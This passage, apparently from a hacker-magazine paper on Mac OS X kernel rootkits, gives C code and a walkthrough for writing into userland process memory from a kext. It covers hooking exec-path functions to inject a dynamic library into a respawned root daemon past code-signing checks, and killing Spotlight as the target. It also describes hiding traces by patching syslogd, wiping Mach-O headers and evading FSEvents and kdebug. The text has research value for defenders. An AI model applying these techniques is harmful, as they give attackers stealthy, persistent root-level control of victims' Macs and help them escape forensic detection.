__LINKEDIT segment. 4) Solve any required symbol by processing the __LINKEDIT buffer using the LC_SYMTAB collected information (offsets to symbol and string tables). 5) Do not forget to add the kernel ASLR slide to the addresses. Slide can be computed by the difference between running __TEXT vmaddr and the one read from disk. There is no need to read the whole mach_kernel file into kernel space, we just need the headers and __LINKEDIT segment, around 1MB, smaller than the 7.8MB of Mountain Lion 10.8.2 full kernel. Kernel memory is at a premium :-) --[ 4 - Executing userland binaries from the kernel This section describes a technique to execute userland processes from a kernel extension (not tested but should also be valid from IOKit drivers). For this purpose wowie and ghalen used the KUNC API (Kernel-User Notification Center), a straightforward interface to execute userland executables. One problem with KUNC is that the required symbols are provided by the Unsupported KPI and Apple has the following note: The Kernel-User Notification Center APIs are not available to KEXTs that declare dependencies on the sustainable kernel programming interfaces (KPIs) introduced in OS X v10.4. Having different ways to accomplish a given goal is more fun and improves knowledge, which is this paper's main goal. The technique to be presented is probably not the most efficient one but it is a good learning experience about playing with kernel and how everything is implemented. ----[ 4.1 - Writing from kernel memory into userland processes The first step is to find a way to write to userland process addresses from a kernel extension. In userland there is the mach_vm_write() function (or older vm_write()) to write to any arbitrary process, assuming we have the right permissions to do so (task_for_pid() is our friend). Its prototype is: kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); If you look at the definition of the task structure (a void* at proc structure but defined at osfmk/kern/task.h) you can find the first parameter to mach_vm_write in the "map" field. The remaining parameters are the target address, the data buffer to write and its size. Do not forget that we need first to use mach_vm_protect (or vm_protect) to change memory protections if trying to write to the read-only segments/sections. The problem with this approach is that it does not work! The memory protection is changed but mach_vm_write() does not modify the target address. The answer is that if called like this we are trying to write data from kernel space directly to the userland space, which should (obviously!) fail. Remember we need to use copyin/copyout to copy between the two spaces. We need another solution and I will present not one but two, both easy to use. Thanks go to snare for giving me some initial sample code from his own research. The first solution uses three functions, vm_map_copyin(), vm_map_copyout(), and mach_vm_copy(). You can read their description at osfmk/vm/vm_map.c and vm_user.c in XNU sources. vm_map_copyin creates an object from a given address located in a given map that we can insert into another address space. This assures the correct transition between kernel and user virtual memory spaces. The vm_map_copyout() function copies the object into the target map, aka, our target process. We need the vm_map_t info for kernel and target process - both can be found by iterating proc list or proc_find(), as previously described. There is one important detail about vm_map_copyout! It injects the object "into newly-allocated space in the destination map". What this means is that we are just copying the data into a new memory address at the user process and not at the target address we want. Let me show you with an example of what happens using that command: char *fname = "nemo_and_snare_rule!"; kern_return_t kr = 0; vm_map_address_t dst_addr; kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname, strlen(fname)+1, FALSE, ©); kr = vm_map_copyout(task->map, &dst_addr, copy); dst_addr will contain the value 0x11fa000 (target was a 32 bits process). Dumping the process memory: sh-3.2# ./readmem -p 121 -a 0x11fa000 -s 32 [ Readmem v0.4 - (c) fG! ] -------------------------- Memory protection: rw-/rwx 0x11fa000 6e 65 6d 6f 5f 61 6e 64 5f 73 6e 61 72 65 5f 72 nemo_and_snare_r 0x11fa010 75 6c 65 21 00 00 00 00 00 00 00 00 00 00 00 00 ule!............ At this point we need to copy the contents to the target address we want to. This can be achieved using mach_vm_copy() - a function that copies one memory region to another within the same task. The address where the data was copied to can be found at the second parameter of vm_map_copyout(). It must be noticed that the first two functions are available as Private KPIs and mach_vm_copy() is not exported (I cheated in above's example). Not a big problem since we can easily solve the symbols. The sample code to write to the Mach-O header of a 32 bits, no ASLR binary could be something like this: // get proc_t structure and task pointers struct proc *p = proc_find(PID); struct proc *p_kernel = proc_find(0); struct task *task = (struct task*)(p->task); struct task *kernel_task = (struct task*)(p_kernel->task); kern_return_t kr = 0; vm_prot_t new_prot = VM_PROT_WRITE | VM_PROT_READ; kr = mach_vm_protect((vm_map_t)task->map, 0x1000, len, FALSE, new_prot); vm_map_copy_t copy; char *fname = "nemo_and_snare_rule!"; vm_map_address_t dst_addr; // create a vm_map_copy_t object so we can insert it at userland process kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname, strlen(fname)+1, FALSE, ©); // copy the object to userland, this will allocate a new space into target // map kr = vm_map_copyout((vm_map_t)task->map, &dst_addr, copy); printf("wrote to userland address 0x%llx

", CAST_USER_ADDR_T(dst_addr)); // and now we can use mach_vm_copy() because it copies data within the same // task kr = mach_vm_copy((vm_map_t)task->map, CAST_USER_ADDR_T(dst_addr), strlen(fname)+1, 0x1000); // release references created with proc_find() - must be always done! proc_rele(p); proc_rele(p_kernel); To deallocate that new allocated space in userland vm_map_remove() is a good candidate: /* * vm_map_remove: * Remove the given address range from the target map. * This is the exported form of vm_map_delete. */ extern kern_return_t vm_map_remove(vm_map_t map, vm_map_offset_t start, vm_map_offset_t end, boolean_t flags); An easy alternative is to just zero those bytes and assume that space as a small memory leak. It works and it is not a big deal. The second solution requires a single function and has no memory allocation at the target process. We are talking about vm_map_write_user(): "Copy out data from a kernel space into space in the destination map. The space must already exist in the destination map." The prototype: kern_return_t vm_map_write_user(vm_map_t map, void *src_p, vm_map_address_t dst_addr, vm_size_t size); Where map is the vm_map_t of the target process, and src_p the kernel data buffer we want to write to the process. The previous example using this function: struct proc *p = proc_find(PID); struct task *task = (struct task*)(p->task); kern_return_t kr = 0; vm_prot_t new_protection = VM_PROT_WRITE | VM_PROT_READ; char *fname = "nemo_and_snare_rule!"; // modify memory permissions kr = mach_vm_protect(task->map, 0x1000, len, FALSE, new_protection); kr = vm_map_write_user(task->map, fname, 0x1000, strlen(fname)+1); proc_rele(p); This alternative is easier and does not allocate new memory at the target. Do not forget to restore the original memory permissions. After so many words you are probably asking why not use copyout to copy from kernel to userland? Well, of course it is possible but there is a problem. It can't be used to overwrite to arbitrary processes - only against the current process. Even if we try to change the current map to another process using vm_map_switch(), copyout will always retrieve the current process so copyout will fail with EFAULT if we try an address of another process that does not exists in current. This means that it can be used, for example, inside a hooked syscall but not to write to arbitrary processes. ----[ 4.2 - Abusing (again!) dyld to inject and run code Most of the time hacking is about abusing features or lack-of. This time we are going to piggyback on dyld and launchd. Poor bastards! The idea is that launchd will restart our target process and dyld will be responsible for executing our code. I used the dyld approach in OS.X/Boubou PoC described at [12] and [34], so why not again? It is easy to implement and works very well. The core of this idea is to emulate the DYLD_INSERT_LIBRARIES (equivalent to LD_PRELOAD for those coming from ELF Unix world) when a new process is created. The library will be responsible for executing whatever we want to. In this case we want to modify the Mach-O header before passing control to dyld. When dyld gains control (it is dyld who passes control to target's entrypoint not the kernel) it will read the header from target's memory and process it. This presents an opportunity to successfully modify and inject the Mach-O header. The presentations at Secuinside [11] and HitCon [12] discuss the Mach-O header details and injection process. This is valid for dynamically linked executables, where execution will start at the dynamic linker (/usr/lib/dyld) and then continue at the executable entry point. Launchd is the perfect target because it can automatically respawn daemons and agents, at root or user privilege level. The idea is to kill a daemon, intercept the respawn and inject the library we want to be executed. The privilege level we want to execute at depends on the target daemon. What we need is to find a good place to intercept the respawn of the target process and modify its memory before control is passed to dyld. A simplified version of the binary execution process, adapted from [13] is: execve() -> __mac_execve() | v exec_activate_image() | v Read file | v .----> exec_mach_imgact() -> run dyld -> target entry point | | | v | load_machfile() | | | v | parse_machfile() [maps the load commands into memory] | | | v | load_dylinker() [sets image entrypoint to dyld] | | | v `--------- (...) Chapter 7 of [14] and Chapter 13 of [13] thoroughly describe the execution process in case you are interested in every detail. The above diagram presents many places where we can modify the new process memory and its Mach-O header. As previously mentioned, when dyld gains control it will parse again the Mach-O header so our modification is guaranteed to be used if made before dyld's control. We can confirm this by looking at dyld source code [15]: // // Entry point for dyld. The kernel loads dyld and jumps to __dyld_start // which sets up some registers and call this function. // // Returns address of main() in target program which __dyld_start jumps to // uintptr_t _main(const macho_header* mainExecutableMH, uintptr_t mainExecutableSlide, int argc, const char* argv[], const char* envp[], const char* apple[], uintptr_t* startGlue) One curious detail (without any practical application I can foresee now) is that dyld does not validate the header - the magic value can be modified to anything and dyld will happily continue its work. Kernel data can be trusted, right? ----[ 4.3 - Finding the place to execute the injection With theory in place it is finally time to move to practice! We need to find one or more places where we can modify the target process memory and inject our dynamic library. The kernel has no symbol stubs so we can't just modify a pointer and hijack a useful function. One solution is to inline hook the function prologue and make it jump to our function. We can simplify this by implementing the whole original function (copy from XNU source into our rootkit); this way we do not need to return back to the original one, just restore the original bytes when we finish our evil work. A good starting point to look for candidate functions is exec_mach_imgact(). The reason why is that when it returns control to dyld everything required to execute the new process is set (kernel side). As much as possible near its end is best. After exploring exec_mach_imgact, I found a good candidate at task_set_dyld_info(). It is called twice, one before the image is loaded into memory, and another after the image is loaded. Clearly, the former does not interest us so we need to distinguish between each case. This function is only used at exec_mach_imgact(). Looking at its code in osfmk/kern/task.c: void task_set_dyld_info(task_t task, mach_vm_address_t addr, mach_vm_size_t size) { task_lock(task); task->all_image_info_addr = addr; task->all_image_info_size = size; task_unlock(task); } The locks calls are nothing else than macros using a symbol available in KPIs: #define task_lock(task) lck_mtx_lock(&(task)->lock) #define task_unlock(task) lck_mtx_unlock(&(task)->lock) It is a great candidate - we can copy & paste its code into our rootkit source, add our code to inject the library and then execute the original function code. Because it is not a static function we can find its symbol. The first parameter is a task_t structure, which has a pointer to the correspondent proc_t structure (remember that proc and task structures are connected to each other via void pointers). The proposed workflow could be: 1) Find task_set_dyld_info() address. 2) Patch prologue to jump to our function. 3) Execute our function to inject library. 4) Restore original bytes from 2). 5) Execution continues, our library is executed by dyld. The only problem with this function is here at exec_mach_imgact(): /* * Remember file name for accounting. */ p->p_acflag &= ~AFORK; /* If the translated name isn't NULL, then we want to use * that translated name as the name we show as the "real" name. * Otherwise, use the name passed into exec. */ if (0 != imgp->ip_p_comm[0]) { bcopy((caddr_t)imgp->ip_p_comm, (caddr_t)p->p_comm, sizeof(p->p_comm)); } else { if (imgp->ip_ndp->ni_cnd.cn_namelen > MAXCOMLEN) imgp->ip_ndp->ni_cnd.cn_namelen = MAXCOMLEN; bcopy((caddr_t)imgp->ip_ndp->ni_cnd.cn_nameptr, (caddr_t)p->p_comm, (unsigned)imgp->ip_ndp->ni_cnd.cn_namelen); p->p_comm[imgp->ip_ndp->ni_cnd.cn_namelen] = '\0'; } The process name in proc_t structure is only set after the second call to task_set_dyld_info(), so we can't use it to detect which process is going to be executed and trigger or not our injection (remember we are only interested in a specific process to be executed by launchd). A workaround to this problem is to lookup the open files structure in proc_t (p_fd field). An alternative solution is to use another function! There is an even better one near the end of exec_mach_imgact() called proc_resetregister(). The advantage of being near the end is that we can change a lot more things (kernel completed most of its tasks related to new process execution), opening way for some cute tricks. Its implementation is also very simple [bsd/kern/kern_proc.c]: void proc_resetregister(proc_t p) { proc_lock(p); p->p_lflag &= ~P_LREGISTER; proc_unlock(p); } The lock/unlock here are implemented as functions instead of macros and not exported. We can simply define the macros or change our code to use lck_mtx_*. This time we have a proc_t structure and can use the p_comm field to find our target(s) (or proc_name() to get the name of a given pid). Perfect spot! With a location where to execute our modifications we can proceed to the last step, modify the target Mach-O header. ----[ 4.4 - Ideas are great, execution is everything Assuming that our hijacked function is proc_resetregister(), we can extract all the information we will need from the proc_t parameter. Let's proceed with this. The number of binaries that use ASLR is increasing so the first step is to find at which memory address is the binary loaded (the Mach-O header to be more specific). The ASLR slide is generated inside load_machfile() and not set in a struct/var or returned. One way to solve the problem is to take a peak at the virtual memory map (vmap) of the target process. The following does the job (assuming we are inside our own proc_resetregister()): struct task *task = (struct task*)p->task; mach_vm_address_t start_address = task->map->hdr.links.start; Start contains the lower address of the process, which is where the Mach-O header is located at. This *appears* to hold always true (there are good reasons to believe it!). To modify the Mach-O header of the target process we need to parse the header to find free space where we can add the new LC_LOAD_DYLIB command. The necessary free space is common - most binaries have enough slack space between the last command and first code/data. The header can be retrieved from the user space with vm_map_read_user() or copyin (because here we are executing in current proc context). After we have found the free space and the full Mach-O header is in our buffer, we just need to add a new LC_LOAD_DYLIB command. The two below diagrams show what needs to be done at the Mach-O header: .-------------------. | HEADER |<- Fix this struct: |-------------------| struct mach_header { | Load Commands | uint32_t magic; | .-------------. | cpu_type_t cputype; | | Command 1 | | cpu_subtype_t cpusubtype; | |-------------| | uint32_t filetype; | | Command 2 | | uint32_t ncmds; <- add +1 | |-------------| | uint32_t sizeofcmds; <- += size of new cmd | | ... | | uint32_t flags; | |-------------| | }; | | Command n | | | |-------------| | | | Command n+1 | |<- add new command here: | `------------- | struct dylib_command { |-------------------| uint32_t cmd; | Data | uint32_t cmdsize; | .---------------. | struct dylib dylib; | | | Section 1 | | }; | | 1 |-----------| | struct dylib { | | | Section 2 | | union lc_str name; | `--------------- | uint32_t timestamp; | .---------------. | uint32_t current_version; | | | Section 1 | | uint32_t compatibility_version; | | 2 |-----------| | }; | | | Section 2 | | union lc_str { | `--------------- | uint32_t offset; | ... | #ifndef __LP64__ // not used | | char *ptr; | | #endif | | }; `------------------- A diff between original and modified: .-------------------. .-------------------. | HEADER | | HEADER |<- Fix this struct |-------------------| |-------------------| struct mach_header { | Load Commands | | Load Commands | ... | .-------------. | | .-------------. | uint32_t ncmds; <- fix | | Command 1 | | | | Command 1 | | uint32_t sizeofcmds;<- fix | |-------------| | | |-------------| | ... | | Command 2 | | | | Command 2 | | }; | |-------------| | | |-------------| | | | ... | | | | ... | | | |-------------| | | |-------------| | | | Command n | | | | Command n | | | `------------- | | |-------------| | | |---->| | Command n+1 | |<- add new command here | |---->| `------------- | struct dylib_command { |-------------------|---->|-------------------| uint32_t cmd; | Data |---->| Data | uint32_t cmdsize; | .---------------. |---->| .---------------. | struct dylib dylib; | | | Section 1 | |---->| | | Section 1 | | }; | | 1 |-----------| | | | 1 |-----------| | | | | Section 2 | | | | | Section 2 | | | `--------------- | | `--------------- | | .---------------. | | .---------------. | | | | Section 1 | | | | | Section 1 | | | | 2 |-----------| | | | 2 |-----------| | | | | Section 2 | | | | | Section 2 | | | `--------------- | | `--------------- | | ... | | ... | `------------------- `------------------- There are other methods to inject the library if there is not enough space. One that requires only 24 bytes is described at [16]. This approach has one interesting advantage - it is not detectable by code signing because the injection occurs after its checks and flags are set. This is the code that sets the flags: /* * Set code-signing flags if this binary is signed, or if parent has * requested them on exec. */ if (load_result.csflags & CS_VALID) { imgp->ip_csflags |= load_result.csflags & (CS_VALID| CS_HARD|CS_KILL|CS_EXEC_SET_HARD|CS_EXEC_SET_KILL); } else { imgp->ip_csflags &= ~CS_VALID; } if (p->p_csflags & CS_EXEC_SET_HARD) imgp->ip_csflags |= CS_HARD; if (p->p_csflags & CS_EXEC_SET_KILL) imgp->ip_csflags |= CS_KILL; The code snippet is from exec_mach_imgact() and located well before our two candidate functions described in section 4.3. Code signing does not kill immediately the process. The flags are verified later and a kill signal sent if code signing was configured to exit on failure (which we can also modify here). The only puzzle piece left is which process should we use and how to kill it. There are many root processes controlled by launchd so it is just a matter of selecting one with invisible and/or small impact. Spotlight is for example a good candidate. A code snippet to do the killing: proc_t victim = proc_find(TARGET_PID); if (victim != PROC_NULL) { // we need to release reference count from proc_find() before kill proc_rele(kill); // now we can kill the process or use SIGSEV coz' Spotlight crashes, // right? :-) psignal(kill, SIGKILL); } When launchd respawns the process, we can intercept it at exec_mach_imgact() and do our magic. The rest is responsibility of the dynamic library. ----[ 4.5 - The dynamic library The dynamic library is very easy to create if you use the Xcode template (oh the drama, hackers use Makefiles!) or just Google for a simple Makefile. To execute the library code you can add an entrypoint via a constructor: extern void init(void) __attribute__ ((constructor)); void init(void) { // do evil stuff here } init will be executed as soon as the library is loaded. Another way could be by modifying the injected process symbol stub and redirect to an entrypoint function inside the library. While the symbol stub modification could be made from the kernel, we do not know yet where library will be loaded so it is harder to execute this. For example, it could be delayed by hijacking a syscall, wait for its execution and then modify a symbol. The downside is more time for detection as explained in next section. Honestly I have not thought much about this case. To execute commands from the library it is just a matter of fork'ing and exec'ing whatever command we need. We can also create a new thread (or multiple) to leave a resident backdoor and so on. Or just execute the command we need and clean up ourselves to leave no traces. It is up to you and your particular requirements and imagination :-). ----[ 4.6 - Hiding our tracks By principle, a rootkit should be as stealth as possible - we need to cover our tracks to the maximum possible extent. Let me discuss a few problems and potential solutions with the previously described approaches. The first one is that we need to restart a target process. This will leave an immediate clue on a (potentially very) higher PID, depending when the method is used (near startup it is ok). Another clue is that we are sending a signal to the target process and syslogd will capture it. Instead of a kill we could send a SIGSEGV (Apple's software has bugs, right?), or just temporarily memory patch syslogd daemon to avoid logging our little trick. Different possibilities to solve this problem! The SIGSEGV is particularly interesting since the resulting crash dump has no useful information and it only leaves this log trail: 12/21/12 3:27:13.093 AM com.apple.launchd[1]: (com.apple.metadata.mds[277]) Job appears to have crashed: Segmentation fault: 11 Patching (temporarily or not) syslogd is rather easy to accomplish. Looking at Apple's syslogd source we can find the following function in syslogd/daemon.c: void process_message(aslmsg msg, uint32_t source) Near the end it has this code: /* send message to output modules */ asl_out_message(msg); if (global.bsd_out_enabled) bsd_out_message(msg); The asl_out_message() appears to be the interesting place to patch. To quickly test this theory we can attach gdb to syslogd (warning, ASLR enabled), and patch that function. We need to search the function address because there are no debug symbols available. Let's look at its implementation: void asl_out_message(aslmsg msg) { dispatch_flush_continuation_cache(); asl_msg_retain((asl_msg_t *)msg); dispatch_async(asl_action_queue, ^{ _asl_action_message(msg); asl_msg_release((asl_msg_t *)msg); }); } There are two external symbols, dispatch_flush_continuation_cache() and asl_msg_retain(). The former has only a reference and the latter two. To find the location of asl_out_message() we just need to find out the proc_t for syslogd process, read and process its symbol table (we can read from memory or filesystem), correct for ASLR slide, and find the address of the stub. Since this is not IDA we can't easily find the cross-references (oh, IDA spoils us). What we can do is search in the binary the calls to the symbol stub (it is a relative offset call). Even easier (and probably faster) is to disassemble and match the address of the call with the stub - the disassembler will output the final address. After we have the address where dispatch_flush_continuation_cache() is called from we just need to find the function prologue and patch it with a ret (function return is void so no need for xor eax,rax). We can then restore the original byte after we execute our command. Another function, bsd_out_message() might need to be patched, but I leave that task to you, the reader. Another alternative is to try to recycle the PID that was killed. The forkproc() function is the one that allocates the new PID for the child. Might be interesting to research and explore this alternative. You also might want to reorder the proc list and move the new element to the original location instead of being in newer location. Many possibilities to hide and try to detect the rootkit actions. That is why it is fun! The next issue is that process memory will have our injected library so we want to remove it as soon as possible. I did some interesting work in this area but NDA oblige and can't disclose it. It can be done and you should think about it, or just use a brute approach and kill the process again and this time do not inject anything. Whatever works :-) There is no need to have a resident library somewhere at the filesystem ready to be discovered. We can read and write from and to anywhere the filesystem so we can store the library code encrypted inside the kernel module or store it somewhere else, for example in a sqlite3 database (there are so many spread all over OS X). Before the injection we can unpack it somewhere, execute it, and then remove when not needed anymore. One thing I had no time to verify if the impact from Spotlight if we use the unpacking to filesystem approach. It might be able to detect the new file and store in its database, so we must be careful over here. --[ 5 - Revisiting userland<->kernel communication Fortunately there are many options to establish communication between kernel and userland applications in OS X. The sysctl interface previously presented [1] is easy to implement but it is too cumbersome to transfer large amounts of data. Let me present you additional options. ----[ 5.1 - Character devices and ioctl The easiest way to have userland<->kernel communication is to create a character device and use the ioctl interface to control it. We just need to create and register the new device and add the necessary entry point functions. It all starts with the structure cdevsw: /* * Character device switch table */ struct cdevsw { open_close_fcn_t *d_open; open_close_fcn_t *d_close; read_write_fcn_t *d_read; read_write_fcn_t *d_write; ioctl_fcn_t *d_ioctl; stop_fcn_t *d_stop; reset_fcn_t *d_reset; struct tty **d_ttys; select_fcn_t *d_select; mmap_fcn_t *d_mmap; strategy_fcn_t *d_strategy; void *d_reserved_1; void *d_reserved_2; int d_type; }; The most interesting entrypoints for our purposes are open, close, ioctl. If you are interested in using this communication channel, you probably should think about encrypting it or some kind of authentication method. OS.X/Crisis has no authentication whatsoever so anyone can send commands to the kernel rootkit after (easily) finding all the possible ioctl commands. The code is very simple so there is no point in discussing it here. The provided source code implements this and kernel control so you can browse it and verify how it is done. Besides the problems with encryption, authentication and ioctl commands reversing, this solution creates a new character device that needs to be hidden or else it will be too easy to detect. And then we have additional traces inside the kernel structures that need to be hidden, creating a vicious circle (rootkits are a vicious circle of hide & seek and that is why they can be so fun to write about). ----[ 5.2 - Kernel Control KPI The kernel control KPI is interesting because it allows bidirectional communication with userland and transfer of large amounts of data. Its implementation is rather simple via a regular socket (PF_SYSTEM). Apple's reference documentation can be found at [17] and sample code at [18]. A kernel extension is responsible for creating the socket and the userland part will read and send data to that same socket (socket access can be restricted to privileged users or everyone). The kernel implementation is done by registering a control structure kern_ctl_reg defined at bsd/sys/kern_control.h. From Apple's example: // the reverse dns name to be used between kernel and userland #define BUNDLE_ID "put.as.hydra" static struct kern_ctl_reg g_ctl_reg = { BUNDLE_ID, /* use a reverse dns name */ 0, /* set to 0 for dynamically assigned control ID */ 0, /* ctl_unit - ignored when CTL_FLAG_REG_ID_UNIT not set */ /* privileged access required to access this filter */ CTL_FLAG_PRIVILEGED, 0, /* use default send size buffer */ 0, /* Override receive buffer size */ ctl_connect, /* Called when a connection request is accepted */ ctl_disconnect, /* called when a connection becomes disconnected */ NULL, /* handles data sent from the client to kernel control */ ctl_set, /* called when the user process makes the setsockopt call */ ctl_get /* called when the user process makes the getsockopt call */ }; The connect and disconnect functions handle userland connections. When a new connection is established we need to retain the unit id and control reference - they are required for sending data and removing the kernel control. The ctl_get function handles the communication from kernel to userland - sends data to the socket when client requests it, and ctl_set handles data from userland to kernel. The kernel data to be sent to userland should be enqueued using ctl_enqueuedata() (this is where we need the unit id and control reference). A quick example of a function to enqueue the PID of a process: static u_int32_t gClientUnit = 0; static kern_ctl_ref gClientCtlRef = NULL; /* * get data ready for userland to grab * send PID of the suspended process and let the userland daemon do the * rest */ kern_return_t queue_userland_data(pid_t pid) { errno_t error = 0; if (gClientCtlRef == NULL) return KERN_FAILURE; error = ctl_enqueuedata(gClientCtlRef, gClientUnit, &pid, sizeof(pid_t), 0); if (error) printf("[ERROR] ctl_enqueuedata failed with error: %d

", error); return error; } Another important detail is about the control ID. Since the recommended way is to use a dynamically assigned control ID, the userland client needs somehow to retrieve it. This can be done using a ioctl request (the reverse dns name must be shared between the kernel and userland). int gSocket = -1; struct ctl_info ctl_info; struct sockaddr_ctl sc; gSocket = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL); // the control ID is dynamically generated so we must obtain sc_id using // ioctl memset(&ctl_info, 0, sizeof(ctl_info)); strncpy(ctl_info.ctl_name, "put.as.hydra", MAX_KCTL_NAME); ctl_info.ctl_name[MAX_KCTL_NAME-1] = '\0'; if (ioctl(gSocket, CTLIOCGINFO, &ctl_info) == -1) { perror("ioctl CTLIOCGINFO"); exit(1); } else printf("ctl_id: 0x%x for ctl_name: %s

", ctl_info.ctl_id, ctl_info.ctl_name); // build the sockaddr control structure and finally connect to the socket bzero(&sc, sizeof(struct sockaddr_ctl)); sc.sc_len = sizeof(struct sockaddr_ctl); sc.sc_family = AF_SYSTEM; sc.ss_sysaddr = AF_SYS_CONTROL; sc.sc_id = ctl_info.ctl_id; sc.sc_unit = 0; ret = connect(gSocket, (struct sockaddr*)&sc, sizeof(sc)); After connection to the socket is established, the userland client can send data using setsockopt() and receive with recv(). The remaining implementation details are easy to understand by reading Apple's referenced sample code. This communication channel might not be that interesting for rootkit'ing purposes because it requires additional effort to hide, in particular the socket information that can be explored by memory forensic tools. If commercial spyware is using character devices for communication then we can't forget this possibility when analysing a potentially compromised machine. Nevertheless it can be interesting for other purposes. As an example, I created a PoC (to be released later) to stop certain processes when they are created ( p->p_stat = SSTOP) and communicate their PID to a userland daemon. The userland daemon attaches to the process and modifies whatever it needs. In this particular case it is used to patch code signed applications without needing to resign and patch any checksum checks. We already saw that OS X code-signining verifications are done before the process is stopped and do not detect these modifications (application own run-time code checksum checks are another story!). It is not the best solution but just a nice set of tricks and demo usage of this communication channel. ----[ 5.3 - Alternative channels The two presented solutions are easy to setup and use but also easy to detect. Their main problem is that they leave "permanent" traces that need to be hidden (kernel structures for example). This increases rootkit's complexity and chances of being detected. Covert channels are a lot more appropriate and a lot has been written about them. Since it is so easy to use almost any kernel function, the possibilities to be creative in this department are much higher. Data can be stealthy read and written anywhere in the filesystem, bypassing many detection and instrumentation mechanisms as it will be shown next. At the limit there is no real need for a direct communication channel! For example, data can be encoded in a binary and intercepted when it is executed. The possibilities are really endless. This very short section is just a reminder that rootkit design can be different from what is usually done and that you should think about it, whether you belong to the offensive or defensive side. --[ 6 - Anti-forensics Mac OS X kernel is instrumentation rich, featuring DTrace and others. These can assist in rootkit uncloaking. Memory forensics is also playing an important role these days in malware detection and analysis. This section goal is to present some ideas on how to attack or hide from these technologies. It is not an exhaustive list but it tries to cover the main ones. OS X kernel is still big and full of interesting places to be explored. Keep that in mind! Due to time constraints it is not possible to write about fooling/defeating the memory forensics tools as I initially planned. It was somewhat similar to what was presented at 29C3 in Defeating Windows memory forensics presentation [33] and other similar work presented in the past. ----[ 6.1 - Cheap tricks to reduce our footprint An extremely easy trick to pull without any side consequences for us is to remove the Mach-O header from process's memory. A memory dump will require additional effort to find and rebuild the original binary (harder in userland binaries, simpler in kernel extensions). Do not forget that Mach-O header permissions are R-X so make it writable first. Kernel extensions must have a start and stop function. Their prototype specifies a kmod_info_t structure as first parameter. It is part of a linked list of all loaded kernel extensions (used to hide the rootkit from kextstat but now marked deprecated) and contains a very useful field to apply this cheap trick. typedef struct kmod_info { struct kmod_info * next; int32_t info_version; // version of this structure uint32_t id; char name[KMOD_MAX_NAME]; char version[KMOD_MAX_NAME]; int32_t reference_count; // # linkage refs to this kmod_reference_t * reference_list; // who this refs (links on) vm_address_t address; // starting address vm_size_t size; // total size vm_size_t hdr_size; // unwired hdr size kmod_start_func_t * start; kmod_stop_func_t * stop; } kmod_info_t; The "address" field contains the starting address of the currently loaded kext, including the ASLR slide (kernel and kernel extensions Mach-O header values include the current kernel ASLR slide). With this information we just need to find out the total size of the header and nuke it: int nuke_mach_header(mach_vm_address_t address) { struct mach_header *mh = (struct mach_header_64*)address; uint32_t header_size = 0; if (mh->magic == MH_MAGIC_64) { header_size = mh->sizeofcmds + sizeof(struct mach_header_64); } else return 1; // we have total header size and startup address // disable CR0 write protection disable_wp(); memset((void*)my_address, 0, header_size); enable_wp(); return 0; } Instead of just zero'ing the header you could fill it with random junk data for fun. You can even mangle data from the other commands (LINKEDIT, LC_SYMTAB, LC_DYSYMTAB, LC_UUID). For example, there are no symbol stubs in kernel - symbols are solved when kernel extension is loaded and calls are made directly to the referenced symbol. This is a problem because it can be used to detect valid code and get hints on what it is trying to do. One can generate a table of all kernel symbols and use it to find cross references in kernel memory and dump that code. Function pointers can help to hide our code - the question is how easy or not it is to bootstrap the rootkit to search the required symbols. One solution can be to use the techniques described before to find the symbols and then mangle the bootstrap code - only leave in memory code using function pointers. Be creative, try to reduce your footprint to the maximum :-). ----[ 6.2 - Attacking DTrace and other instrumentation features Mac OS X has many instrumentation features available. There are at least DTrace, FSEvents, Kauth, kdebug, and TrustedBSD. TrustedBSD's original goal is not instrumentation related but can be used (or abused) for this purpose. Kauth is explored in Section 6.3 with AV-Monster II, while all the others in the next subsections. ------[ 6.2.1 - FSEvents FSEvents is an API for file system notification. Applications register for events that are interested in and receive them via /dev/fsevents. A file system monitor can be built on top of this - the usual suspects [13] and [14] offer a good explanation about its internals and code samples. Jonathan Levin has a "filemon" tool available at his book companion web site. The responsibility to add the events belongs to the function add_fsevent() [bsd/vfs/vfs_fsevents.c]. It is a bit long vararg function and I do not want to spend space and time analysing it. Amit Singh has a nice figure on page 1421 of [14] with functions that add events. For example, the open syscall can generate a file create event (FSE_CREATE_FILE). The next diagram shows the how the event is added: open() -> open_nocancel() -> open1() [bsd/vfs/vfs_syscalls.c] | v [bsd/vfs/vfs_vnops.c] vn_open_auth() -> vn_open_auth_do_create() | v [bsd/vfs/vfs_fsevents.c] add_fsevent() <- need_fsevent() In this particular case we could hijack need_fsevent(), match the file we want to hide and return 0 to avoid event generation. In many cases there is a direct call to add_fsevent() so we also need to hijack it. Inside our new function we need to retrieve the necessary information to match the event we want to hide and return EINVAL or 0 in those cases. You should study the add_fsevent() function to understand how to implement this. I do not think there is much value in describing it here - there are more (interesting) topics to cover. ------[ 6.2.2 - kdebug kdebug is another (rather obscure) kernel trace facility used only by Apple utils such as fs_usage and sc_usage. Documentation is poor and the best references are those utils source code and a few pages by Levin [13]. The relevant include file is bsd/sys/kdebug.h. kdebug is implemented in kernel functions that might produce relevant events using KERNEL_DEBUG() macro. The kernel functions involved (in that macro) are kernel_debug() and kernel_debug_internal() (with always inline attribute). A 32 bits integer is used for the debug messages, with the following format: ---------------------------------------------------------------------- | | | |Func | | Class (8) | SubClass (8) | Code (14) |Qual(2)| ---------------------------------------------------------------------- For example, filesystem operations use class DBG_FSYSTEM (3) and different subclasses to filter between different operations such as read and writes to filesystem, vnode operations, HFS events, etc (consult kdebug.h include). Macros exist to encode the integer for each available class. Using BSD class as an example: #define KDBG_CODE(Class, SubClass, code) (((Class & 0xff) << 24) | ((SubClass & 0xff) << 16) | ((code & 0x3fff) << 2)) #define BSDDBG_CODE(SubClass, code) KDBG_CODE(DBG_BSD, SubClass, code) Grep'ing XNU source code for BSDDBG_CODE will show where kdebug is implemented in all BSD related functions. The fs_usage util traces the file system related system calls (its source is located in system_cmds-550.10 package). For example, it contains the following code for open() syscall: #define BSC_open 0x040C0014 If we look at kdebug's include we have the following Class and SubClass codes: #define DBG_BSD 4 #define DBG_BSD_EXCP_SC 0x0C /* System Calls */ Open is syscall #5 and it matches the code: (0x040C0014 & 0x3FFF) >> 2 = 0x5 Grep'ing for the DBG_BSD_EXCP_SC SubClass will land us into bsd/dev/i386/systemcalls.c - the file that implements the C portion of syscalls code. kdebug's tracing of syscalls entry and exit can be found at unix_syscall64 using two macros that call kernel_debug(): (...) 